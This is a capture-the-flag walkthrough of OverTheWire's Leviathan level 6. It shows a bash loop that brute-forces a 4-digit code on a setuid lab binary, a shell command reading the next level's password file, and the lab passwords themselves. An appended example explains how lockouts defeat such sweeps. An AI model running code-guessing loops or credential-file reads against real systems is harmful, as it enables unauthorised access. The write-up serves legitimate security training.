Access
SSH: ssh leviathan6@leviathan.labs.overthewire.org -p 2223
Password: AL5Hmapwi1
Info
Description: There is no information for this level, intentionally.
Theory
The task gives no details to work from, so we'll skip straight to solving it.
Solution
First of all, we will use ls -la to list all files, including hidden ones, along with some details of each file/folder:
~$ ls -la
total 36
drwxr-xr-x  2 root       root        4096 Sep 19 07:07 .
drwxr-xr-x 83 root       root        4096 Sep 19 07:09 ..
-rw-r--r--  1 root       root         220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root       root        3771 Mar 31  2024 .bashrc
-r-sr-x---  1 leviathan7 leviathan6 15032 Sep 19 07:07 leviathan6
-rw-r--r--  1 root       root         807 Mar 31  2024 .profile
Let's check out this leviathan6 file as it is the only file here:
~$ ./leviathan6
usage: /home/leviathan6/leviathan6 <4 digit code>
So it seems like the program is one of those small versions of the next level's terminal, but to enter, we need a 4-digit code. Nothing here gives us a hint about what it could be, so that brings us to brute forcing it: entering every possible code until one works. Typing ten thousand numbers by hand is pretty hard, so we'll make a temporary directory and write a script to do the brute forcing:
~$ mktemp -d
/tmp/tmp.zB1xrHuD9y
~$ cd /tmp/tmp.zB1xrHuD9y
/tmp/tmp.zB1xrHuD9y$ vim bruteforce.sh
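I'm using vim because nano was glitching a bit. Basically we're going to loop through all the numbers from 0000 to 9999, using echo to print each number before trying it so we know which one it is. After entering this code, use :wq to save and close:
#!/bin/bash
# Try every 4-digit code from 0000 to 9999 (leading zeros kept).
for a in {0000..9999}
do
    echo "$a"            # show which code is being tried
    ~/leviathan6 "$a"    # run the binary with that code
done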
Now we're going to make the script executable with chmod +x and run it:
/tmp/tmp.zB1xrHuD9y$ ls
bruteforce.sh
/tmp/tmp.zB1xrHuD9y$ chmod +x bruteforce.sh
/tmp/tmp.zB1xrHuD9y$ ./bruteforce.sh
0000
Wrong
0001
Wrong
0002
Wrong
0003
Wrong
...
Now just wait a couple of seconds until you get the $ symbol, where you can get the password for the next level. I will just exit here to clear my terminal of 20000 lines of numbers and wrongs; the number is the one right before the $ symbol, like here:
...
Wrong
7122
Wrong
7123
$ exit
7124
Wrong
...
Now that I've cleared my terminal, we can re-enter the small next level terminal using the number that appeared just above the small terminal's dollar symbol, like this:
/tmp/tmp.zB1xrHuD9y$ ~/leviathan6 7123
$ whoami
leviathan7
So just like past levels, we'll grab the password from this little thing:
$ cat /etc/leviathan_pass/leviathan7
uTRobztpgO
And that's our password! Now you can exit twice because you are inside the small next level terminal, and then go to the next level.
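Why the sweep above works, and what stops it, shown as an added example that is not part of the original walkthrough and is not the leviathan6 binary. It uses a constructed stand-in checker with an assumed code (SECRET), an assumed failure limit (MAX_FAILS) and hypothetical functions check_plain, check_lockout, reset_lockout and sweep:

```shell
#!/bin/bash
# Constructed stand-in for a 4-digit code check; NOT the leviathan6 binary.
# SECRET, MAX_FAILS and the state file are assumptions made for this demo.
SECRET=0427
MAX_FAILS=5
STATE=$(mktemp)                 # holds the running count of failed guesses
reset_lockout() { echo 0 > "$STATE"; }
reset_lockout

# Unthrottled check: every guess gets an answer, so walking the
# 10,000-code keyspace always ends with the right code.
check_plain() {
    [ "$1" = "$SECRET" ]
}

# Throttled check: after MAX_FAILS wrong guesses it refuses everything,
# including the right code, until the counter is reset out of band.
check_lockout() {
    fails=$(cat "$STATE")
    [ "$fails" -ge "$MAX_FAILS" ] && return 2       # locked out
    if [ "$1" = "$SECRET" ]; then
        reset_lockout
        return 0
    fi
    echo $((fails + 1)) > "$STATE"
    return 1
}

# Walk 0000..9999 in order, as bruteforce.sh does. $1 names the check to
# use. Prints how many guesses were answered and how the sweep ended.
sweep() {
    i=0; tried=0
    while [ "$i" -le 9999 ]; do
        code=$(printf '%04d' "$i")                  # keep leading zeros
        rc=0; "$1" "$code" || rc=$?
        [ "$rc" -eq 2 ] && { echo "$tried locked"; return 0; }
        tried=$((tried + 1))
        [ "$rc" -eq 0 ] && { echo "$tried found"; return 0; }
        i=$((i + 1))
    done
    echo "$tried exhausted"
}

sweep check_plain       # 428 found
sweep check_lockout     # 5 locked
```

A hard lockout like this trades brute-force resistance for a denial-of-service risk, since anyone can burn the attempts; a delay that grows with each failure is the usual alternative.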
https://overthewire.org/wargames/leviathan/leviathan7.html